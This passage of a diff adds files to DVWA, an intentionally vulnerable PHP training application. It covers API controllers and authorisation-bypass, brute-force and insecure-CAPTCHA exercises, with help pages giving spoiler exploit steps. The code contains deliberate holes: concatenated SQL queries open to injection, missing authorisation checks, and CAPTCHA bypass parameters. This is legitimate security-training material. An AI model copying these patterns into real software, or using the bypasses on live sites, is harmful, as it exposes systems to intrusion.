$this->getAllOrders(); + }; + break; + case 'POST': + $response = $this->addOrder(); + break; + case 'PUT': + $response = $this->updateOrder($this->orderId); + break; + case 'DELETE': + $response = $this->deleteOrder($this->orderId); + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + exit(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} diff --git a/DVWA/vulnerabilities/api/src/Token.php b/DVWA/vulnerabilities/api/src/Token.php new file mode 100644 index 00000000..e9a2bd9f --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Token.php @@ -0,0 +1,62 @@ + $secret, + "expires" => $expires, + ))); + return $token; + } + + public function decrypt_token($token) { + $decrypted = self::decrypt($token); + + if ($decrypted === false) { + return false; + } + + $token = json_decode ($decrypted, true); + return $token; + } +} + +?> diff --git a/DVWA/vulnerabilities/api/src/User.php b/DVWA/vulnerabilities/api/src/User.php new file mode 100644 index 00000000..76560cba --- /dev/null +++ b/DVWA/vulnerabilities/api/src/User.php @@ -0,0 +1,77 @@ +id = $id; + $this->name = $name; + $this->level = $level; + $this->password = $password; + } + + public function toArray($version) { + switch ($version) { + case 1: + $a = array ( + "id" => $this->id, + "name" => $this->name, + "level" => $this->level, + "password" => $this->password, + ); + break; + default: + case 2: + $a = array ( + "id" => $this->id, + "name" => $this->name, + "level" => $this->level, + ); + break; + } + + return $a; + } +} + +#[OAT\Schema(required: ['level', 'name'])] +final class UserAdd +{ + #[OAT\Property(example: "fred")] + public string $name; + + #[OAT\Property(type: 'integer', example: 1)] + public string $level; +} + +#[OAT\Schema(required: ['name'])] +final class UserUpdate +{ + #[OAT\Property(example: "fred")] + public string $name; +} diff --git a/DVWA/vulnerabilities/api/src/UserController.php b/DVWA/vulnerabilities/api/src/UserController.php new file mode 100644 index 00000000..b39e968a --- /dev/null +++ b/DVWA/vulnerabilities/api/src/UserController.php @@ -0,0 +1,298 @@ +data = array ( + 1 => new User (1, "tony", 0, '1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032'), + 2 => new User (2, "morph", 1, 'e5326ba4359f77c2623244acb04f6ac35c4dfca330ebcccdf9b734e5b1df90a8'), + 3 => new User (3, "chas", 1, 'a89237fc1f9dd8d424d8b8b98b890dbc4a817bfde59af17c39debcc4a14c21de'), + ); + $this->requestMethod = $requestMethod; + $this->userId = $userId; + $this->version = $version; + } + + private function validateAdd($input) + { + if (! isset($input['name'])) { + return false; + } + if (! isset($input['level'])) { + return false; + } + if (!is_numeric ($input['level'])) { + return false; + } + return true; + } + + private function validateUpdate($input) + { + if (! isset($input['name'])) { + return false; + } + return true; + } + + #[OAT\Get( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/{id}', + operationId: 'getUserByID', + description: 'Get a user by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/User'), + + ), + new OAT\Response( + response: 404, + description: 'User not found.', + ), + ] + ) + ] + + private function getUser($id) + { + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Get( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/', + operationId: 'getUsers', + description: 'Get all users.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent( + type: 'array', + items: new OAT\Items(ref: '#/components/schemas/User') + ) + ), + ] + ) + ] + + private function getAllUsers() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $all = array(); + foreach ($this->data as $user) { + $all[] = $user->toArray($this->version); + } + $response['body'] = json_encode($all); + return $response; + } + + #[OAT\Post( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/', + operationId: 'addUser', + description: 'Create a new user.', + parameters: [ + new OAT\RequestBody ( + description: 'User data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: UserAdd::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/User'), + ), + new OAT\Response( + response: 422, + description: 'Invalid user object provided', + ), + ] + ) + ] + + private function addUser() + { + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateAdd($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + $user = new User(null, $input['name'], intval ($input['level']), hash ("sha256", "password")); + $this->data[] = $user; + $response['status_code_header'] = 'HTTP/1.1 201 Created'; + $response['body'] = json_encode($user->toArray($this->version)); + return $response; + } + + #[OAT\Put( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/{id}', + operationId: 'updateUser', + description: 'Update a user by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + new OAT\RequestBody ( + description: 'New user data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: UserUpdate::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/User'), + ), + new OAT\Response( + response: 404, + description: 'User not found', + ), + new OAT\Response( + response: 422, + description: 'Invalid user object provided', + ), + ] + ) + ] + + private function updateUser($id) + { + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateUpdate($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + if (array_key_exists ("name", $input)) { + $this->data[$id]->name = $input['name']; + } + if (array_key_exists ("level", $input)) { + $this->data[$id]->level = intval ($input['level']); + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Delete( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/{id}', + operationId: 'deleteUserById', + description: 'Delete user by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 404, + description: 'User not found', + ), + ] + ) + ] + + private function deleteUser($id) { + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + unset ($this->data[$id]); + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = null; + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'GET': + if ($this->userId) { + $response = $this->getUser($this->userId); + } else { + $response = $this->getAllUsers(); + }; + break; + case 'POST': + $response = $this->addUser(); + break; + case 'PUT': + $response = $this->updateUser($this->userId); + break; + case 'DELETE': + $response = $this->deleteUser($this->userId); + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + exit(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} diff --git a/DVWA/vulnerabilities/authbypass/authbypass.js b/DVWA/vulnerabilities/authbypass/authbypass.js new file mode 100644 index 00000000..12b35556 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/authbypass.js @@ -0,0 +1,53 @@ +function show_save_result (data) { + if (data.result == 'ok') { + document.getElementById('save_result').innerText = 'Save Successful'; + } else { + document.getElementById('save_result').innerText = 'Save Failed'; + } +} + +function submit_change(id) { + first_name = document.getElementById('first_name_' + id).value + surname = document.getElementById('surname_' + id).value + + fetch('change_user_details.php', { + method: 'POST', + headers: { + 'Accept': 'application/json', + 'Content-Type': 'application/json' + }, + body: JSON.stringify({ 'id': id, 'first_name': first_name, 'surname': surname }) + } + ) + .then((response) => response.json()) + .then((data) => show_save_result(data)); +} + +function populate_form() { + var xhr= new XMLHttpRequest(); + xhr.open('GET', 'get_user_data.php', true); + xhr.onreadystatechange= function() { + if (this.readyState!==4) { + return; + } + if (this.status!==200) { + return; + } + const users = JSON.parse (this.responseText); + table_body = document.getElementById('user_table').getElementsByTagName('tbody')[0]; + users.forEach(updateTable); + + function updateTable (user) { + var row = table_body.insertRow(0); + var cell0 = row.insertCell(-1); + cell0.innerHTML = user['user_id'] + ''; + var cell1 = row.insertCell(1); + cell1.innerHTML = ''; + var cell2 = row.insertCell(2); + cell2.innerHTML = ''; + var cell3 = row.insertCell(3); + cell3.innerHTML = ''; + } + }; + xhr.send(); +} diff --git a/DVWA/vulnerabilities/authbypass/change_user_details.php b/DVWA/vulnerabilities/authbypass/change_user_details.php new file mode 100644 index 00000000..da54d595 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/change_user_details.php @@ -0,0 +1,52 @@ + "fail", "error" => "Access denied")); + exit; +} + +if ($_SERVER['REQUEST_METHOD'] != "POST") { + $result = array ( + "result" => "fail", + "error" => "Only POST requests are accepted" + ); + echo json_encode($result); + exit; +} + +try { + $json = file_get_contents('php://input'); + $data = json_decode($json); + if (is_null ($data)) { + $result = array ( + "result" => "fail", + "error" => 'Invalid format, expecting "{id: {user ID}, first_name: "{first name}", surname: "{surname}"}' + + ); + echo json_encode($result); + exit; + } +} catch (Exception $e) { + $result = array ( + "result" => "fail", + "error" => 'Invalid format, expecting \"{id: {user ID}, first_name: "{first name}", surname: "{surname}\"}' + + ); + echo json_encode($result); + exit; +} + +$query = "UPDATE users SET first_name = '" . $data->first_name . "', last_name = '" . $data->surname . "' where user_id = " . $data->id . ""; +$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
    ' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
    ' ); + +print json_encode (array ("result" => "ok")); +exit; +?> diff --git a/DVWA/vulnerabilities/authbypass/get_user_data.php b/DVWA/vulnerabilities/authbypass/get_user_data.php new file mode 100644 index 00000000..f2eb7c2f --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/get_user_data.php @@ -0,0 +1,42 @@ + "fail", "error" => "Access denied")); + exit; +} + +$query = "SELECT user_id, first_name, last_name FROM users"; +$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); + +$guestbook = ''; +$users = array(); + +while ($row = mysqli_fetch_row($result) ) { + if( dvwaSecurityLevelGet() == 'impossible' ) { + $user_id = $row[0]; + $first_name = htmlspecialchars( $row[1] ); + $surname = htmlspecialchars( $row[2] ); + } else { + $user_id = $row[0]; + $first_name = $row[1]; + $surname = $row[2]; + } + + $user = array ( + "user_id" => $user_id, + "first_name" => $first_name, + "surname" => $surname + ); + $users[] = $user; +} + +print json_encode ($users); +exit; +?> diff --git a/DVWA/vulnerabilities/authbypass/help/help.php b/DVWA/vulnerabilities/authbypass/help/help.php new file mode 100644 index 00000000..61a64115 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/help/help.php @@ -0,0 +1,82 @@ +
    +

    Help - Authorisation Bypass

    + +
    + + + + +
    +

    About

    +

    + When developers have to build authorisation matrices into complex systems it is easy for them to miss adding the right checks in every place, especially those + which are not directly accessible through a browser, for example API calls. +

    + +

    + As a tester, you need to be looking at every call a system makes and then testing it using every level of user to ensure that the checks are being carried out correctly. + This can often be a long and boring task, especially with a large matrix with lots of different user types, but it is critical that the testing is carried out as one missed + check could lead to an attacker gaining access to confidential data or functions. +

    + +

    + +

    Objective

    +

    Your goal is to test this user management system at all four security levels to identify any areas where authorisation checks have been missed.

    +

    The system is only designed to be accessed by the admin user, so have a look at all the calls made while logged in as the admin, and then try to reproduce them while logged in as different user.

    +

    If you need a second user, you can use gordonb / abc123. + +


    + +

    Low Level

    +

    Non-admin users do not have the 'Authorisation Bypass' menu option.

    +

    Spoiler: Try browsing directly to /vulnerabilities/authbypass/.

    + + +
    + +

    Medium Level

    +

    The developer has locked down access to the HTML for the page, but have a look how the page is populated when logged in as the admin.

    +

    Spoiler: Try browsing directly to /vulnerabilities/authbypass/get_user_data.php to access the API which returns the user data for the page.

    + +
    + +

    High Level

    +

    Both the HTML page and the API to retrieve data have been locked down, but what about updating data? You have to make sure you test every call to the site.

    +

    Spoiler: GET calls to retrieve data have been locked down but the POST to update the data has been missed, can you figure out how to call it?

    + +

    Spoiler: This is one way to do it:

    + + 
    fetch('change_user_details.php', {
+method: 'POST',
+headers: {
+'Accept': 'application/json',
+'Content-Type': 'application/json'
+},
+body: JSON.stringify({ 'id':1, "first_name": "Harry", "surname": "Hacker" })
+}
+)
+.then((response) => response.json())
+.then((data) => console.log(data));
+
    + +
    + +

    Impossible Level

    +

    + Hopefully on this level all the functions correctly check authorisation before allowing access to the data. +

    +

    + There may however be some non-authorisation related issues on the page, so do not write it off as fully secure. +

    +
    + +
    + +
    + +

    Reference:

    +

    Reference:

    +

    Reference:

    + +
    diff --git a/DVWA/vulnerabilities/authbypass/index.php b/DVWA/vulnerabilities/authbypass/index.php new file mode 100644 index 00000000..2561e885 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/index.php @@ -0,0 +1,77 @@ + +

    Vulnerability: Authorisation Bypass

    + +

    This page should only be accessible by the admin user. Your challenge is to gain access to the features using one of the other users, for example gordonb / abc123.

    + +
    +
    +
    +

    + Welcome to the user manager, please enjoy updating your user\'s details. +

    + '; + +$page[ 'body' ] .= " + + + + + + + + + + + +
    IDFirst NameSurnameUpdate
    + + +"; + +$page[ 'body' ] .= ' + ' . + $html + . ' +
    +'; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/authbypass/source/high.php b/DVWA/vulnerabilities/authbypass/source/high.php new file mode 100644 index 00000000..9517d944 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/source/high.php @@ -0,0 +1,17 @@ + diff --git a/DVWA/vulnerabilities/authbypass/source/impossible.php b/DVWA/vulnerabilities/authbypass/source/impossible.php new file mode 100644 index 00000000..70ba2e02 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/source/impossible.php @@ -0,0 +1,13 @@ + diff --git a/DVWA/vulnerabilities/authbypass/source/low.php b/DVWA/vulnerabilities/authbypass/source/low.php new file mode 100644 index 00000000..34a169b8 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/source/low.php @@ -0,0 +1,11 @@ + diff --git a/DVWA/vulnerabilities/authbypass/source/medium.php b/DVWA/vulnerabilities/authbypass/source/medium.php new file mode 100644 index 00000000..3e1b126e --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/source/medium.php @@ -0,0 +1,18 @@ + diff --git a/DVWA/vulnerabilities/brute/help/help.php b/DVWA/vulnerabilities/brute/help/help.php new file mode 100644 index 00000000..69b1ae95 --- /dev/null +++ b/DVWA/vulnerabilities/brute/help/help.php @@ -0,0 +1,69 @@ +
    +

    Help - Brute Force (Login)

    + +
    + + + + +
    +

    About

    +

    Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. + A common approach is to repeatedly try guesses for the password.

    + +

    Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, family names, any too short password + (usually thought to be less than 6 or 7 characters), or predictable patterns + (e.g. alternating vowels and consonants, which is known as leetspeak, so "password" becomes "p@55w0rd").

    + +

    Creating a targeted wordlists, which is generated towards the target, often gives the highest success rate. There are public tools out there that will create a dictionary + based on a combination of company websites, personal social networks and other common information (such as birthdays or year of graduation). + +

    A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always + be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords + making the attack time longer.

    + +

    + +

    Objective

    +

    Your goal is to get the administrator’s password by brute forcing. Bonus points for getting the other four user passwords!

    + +

    + +

    Low Level

    +

    The developer has completely missed out any protections methods, allowing for anyone to try as many times as they wish, to login to any user without any repercussions.

    + +
    + +

    Medium Level

    +

    This stage adds a sleep on the failed login screen. This mean when you login incorrectly, there will be an extra two second wait before the page is visible.

    + +

    This will only slow down the amount of requests which can be processed a minute, making it longer to brute force.

    + +
    + +

    High Level

    +

    There has been an "anti Cross-Site Request Forgery (CSRF) token" used. There is a old myth that this protection will stop brute force attacks. This is not the case. + This level also extends on the medium level, by waiting when there is a failed login but this time it is a random amount of time between two and four seconds. + The idea of this is to try and confuse any timing predictions.

    + +

    Using a form could have a similar effect as a CSRF token.

    + +
    + +

    Impossible Level

    +

    Brute force (and user enumeration) should not be possible in the impossible level. The developer has added a "lock out" feature, where if there are five bad logins within + the last 15 minutes, the locked out user cannot log in.

    + +

    If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. This will make it impossible to know + if there is a valid account on the system, with that password, and if the account is locked.

    + +

    This can cause a "Denial of Service" (DoS), by having someone continually trying to login to someone's account. + This level would need to be extended by blacklisting the attacker (e.g. IP address, country, user-agent).

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/brute/index.php b/DVWA/vulnerabilities/brute/index.php new file mode 100644 index 00000000..71d57afe --- /dev/null +++ b/DVWA/vulnerabilities/brute/index.php @@ -0,0 +1,68 @@ + +

    Vulnerability: Brute Force

    + +
    +

    Login

    + +
    + Username:
    +
    + Password:
    +
    +
    + \n"; + +if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + +$page[ 'body' ] .= " +
    + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Brute_force_attack' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.golinuxcloud.com/brute-force-attack-web-forms' ) . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/brute/source/high.php b/DVWA/vulnerabilities/brute/source/high.php new file mode 100644 index 00000000..6eed8d71 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/high.php @@ -0,0 +1,43 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + if( $result && mysqli_num_rows( $result ) == 1 ) { + // Get users details + $row = mysqli_fetch_assoc( $result ); + $avatar = $row["avatar"]; + + // Login successful + $html .= "

    Welcome to the password protected area {$user}

    "; + $html .= ""; + } + else { + // Login failed + sleep( rand( 0, 3 ) ); + $html .= "

    Username and/or password incorrect.
    "; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/brute/source/impossible.php b/DVWA/vulnerabilities/brute/source/impossible.php new file mode 100644 index 00000000..4cf59258 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/impossible.php @@ -0,0 +1,102 @@ +prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); + + // Check to see if the user has been locked out. + if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { + // User locked out. Note, using this method would allow for user enumeration! + //$html .= "

    This account has been locked due to too many incorrect logins.
    "; + + // Calculate when the user would be allowed to login again + $last_login = strtotime( $row[ 'last_login' ] ); + $timeout = $last_login + ($lockout_time * 60); + $timenow = time(); + + /* + print "The last login was: " . date ("h:i:s", $last_login) . "
    "; + print "The timenow is: " . date ("h:i:s", $timenow) . "
    "; + print "The timeout is: " . date ("h:i:s", $timeout) . "
    "; + */ + + // Check to see if enough time has passed, if it hasn't locked the account + if( $timenow < $timeout ) { + $account_locked = true; + // print "The account is locked
    "; + } + } + + // Check the database (if username matches the password) + $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR); + $data->bindParam( ':password', $pass, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); + + // If its a valid login... + if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { + // Get users details + $avatar = $row[ 'avatar' ]; + $failed_login = $row[ 'failed_login' ]; + $last_login = $row[ 'last_login' ]; + + // Login successful + $html .= "

    Welcome to the password protected area {$user}

    "; + $html .= ""; + + // Had the account been locked out since last login? + if( $failed_login >= $total_failed_login ) { + $html .= "

    Warning: Someone might of been brute forcing your account.

    "; + $html .= "

    Number of login attempts: {$failed_login}.
    Last login attempt was at: {$last_login}.

    "; + } + + // Reset bad login count + $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + } else { + // Login failed + sleep( rand( 2, 4 ) ); + + // Give the user some feedback + $html .= "

    Username and/or password incorrect.

    Alternative, the account has been locked because of too many failed logins.
    If this is the case, please try again in {$lockout_time} minutes.
    "; + + // Update bad login count + $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + } + + // Set the last login time + $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/brute/source/low.php b/DVWA/vulnerabilities/brute/source/low.php new file mode 100644 index 00000000..aef430a1 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/low.php @@ -0,0 +1,32 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + if( $result && mysqli_num_rows( $result ) == 1 ) { + // Get users details + $row = mysqli_fetch_assoc( $result ); + $avatar = $row["avatar"]; + + // Login successful + $html .= "

    Welcome to the password protected area {$user}

    "; + $html .= ""; + } + else { + // Login failed + $html .= "

    Username and/or password incorrect.
    "; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/brute/source/medium.php b/DVWA/vulnerabilities/brute/source/medium.php new file mode 100644 index 00000000..a14b9db3 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/medium.php @@ -0,0 +1,35 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + if( $result && mysqli_num_rows( $result ) == 1 ) { + // Get users details + $row = mysqli_fetch_assoc( $result ); + $avatar = $row["avatar"]; + + // Login successful + $html .= "

    Welcome to the password protected area {$user}

    "; + $html .= ""; + } + else { + // Login failed + sleep( 2 ); + $html .= "

    Username and/or password incorrect.
    "; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/captcha/help/help.php b/DVWA/vulnerabilities/captcha/help/help.php new file mode 100644 index 00000000..f2ce041d --- /dev/null +++ b/DVWA/vulnerabilities/captcha/help/help.php @@ -0,0 +1,62 @@ +
    +

    Help - Insecure CAPTCHA

    + +
    + + + + +
    +

    About

    +

    A is a program that can tell whether its user is a human or a computer. You've probably seen + them - colourful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from + "bots", or automated programs usually written to generate spam. No computer program can read distorted text as well as humans can, so bots + cannot navigate sites protected by CAPTCHAs.

    + +

    CAPTCHAs are often used to protect sensitive functionality from automated bots. Such functionality typically includes user registration and changes, + password changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the user account. This provides + limited protection from CSRF attacks as well as automated bot guessing.

    + +

    + +

    Objective

    +

    Your aim, change the current user's password in a automated manner because of the poor CAPTCHA system.

    + +

    + +

    Low Level

    +

    The issue with this CAPTCHA is that it is easily bypassed. The developer has made the assumption that all users will progress through screen 1, complete the CAPTCHA, and then + move on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA system.

    + +

    The parameters required to complete this challenge in low security would be similar to the following:

    + 
    Spoiler: ?step=2&password_new=password&password_conf=password&Change=Change.
    + +
    + +

    Medium Level

    +

    The developer has attempted to place state around the session and keep track of whether the user successfully completed the + CAPTCHA prior to submitting data. Because the state variable (Spoiler: passed_captcha) is on the client side, + it can also be manipulated by the attacker like so:

    + 
    Spoiler: ?step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change.
    + +
    + +

    High Level

    +

    There has been development code left in, which was never removed in production. It is possible to mimic the development values, to allow + invalid values in be placed into the CAPTCHA field.

    +

    You will need to spoof your user-agent (Spoiler: reCAPTCHA) as well as use the CAPTCHA value of + (Spoiler: hidd3n_valu3) to skip the check.

    + +
    + +

    Impossible Level

    +

    In the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one + single step. Alternatively, the developer could have moved the state variable server side (from the medium level), so the user cannot alter it.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/captcha/index.php b/DVWA/vulnerabilities/captcha/index.php new file mode 100644 index 00000000..a0d76fd7 --- /dev/null +++ b/DVWA/vulnerabilities/captcha/index.php @@ -0,0 +1,98 @@ +reCAPTCHA API key missing from config file: " . realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . "config" . DIRECTORY_SEPARATOR . "config.inc.php" ) . ""; + $html = "Please register for a key from reCAPTCHA: " . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/admin/create' ); + $hide_form = true; +} + +$page[ 'body' ] .= " +
    +

    Vulnerability: Insecure CAPTCHA

    + + {$WarningHtml} + +
    +
    \n"; + +if( $vulnerabilityFile == 'impossible.php' ) { + $page[ 'body' ] .= " + Current password:
    +
    "; +} + +$page[ 'body' ] .= " New password:
    +
    + Confirm new password:
    +
    + + " . recaptcha_get_html( $_DVWA[ 'recaptcha_public_key' ] ); +if( $vulnerabilityFile == 'high.php' ) + $page[ 'body' ] .= "\n\n \n"; + +if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= "\n " . tokenField(); + +$page[ 'body' ] .= " +
    + + +
    + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/CAPTCHA' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-009_CAPTCHA_Defeat' ) . "
      • +
    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/captcha/source/high.php b/DVWA/vulnerabilities/captcha/source/high.php new file mode 100644 index 00000000..fb03377f --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/high.php @@ -0,0 +1,55 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for user + $html .= "
    Password Changed.
    "; + + } else { + // Ops. Password mismatch + $html .= "
    Both passwords must match.
    "; + $hide_form = false; + } + + } else { + // What happens when the CAPTCHA was entered incorrectly + $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; + $hide_form = false; + return; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/captcha/source/impossible.php b/DVWA/vulnerabilities/captcha/source/impossible.php new file mode 100644 index 00000000..5bb475d8 --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/impossible.php @@ -0,0 +1,67 @@ +
    The CAPTCHA was incorrect. Please try again."; + $hide_form = false; + } + else { + // Check that the current password is correct + $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); + + // Do both new password match and was the current password correct? + if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) { + // Update the database + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->execute(); + + // Feedback for the end user - success! + $html .= "
    Password Changed.
    "; + } + else { + // Feedback for the end user - failed! + $html .= "
    Either your current password is incorrect or the new passwords did not match.
    Please try again.
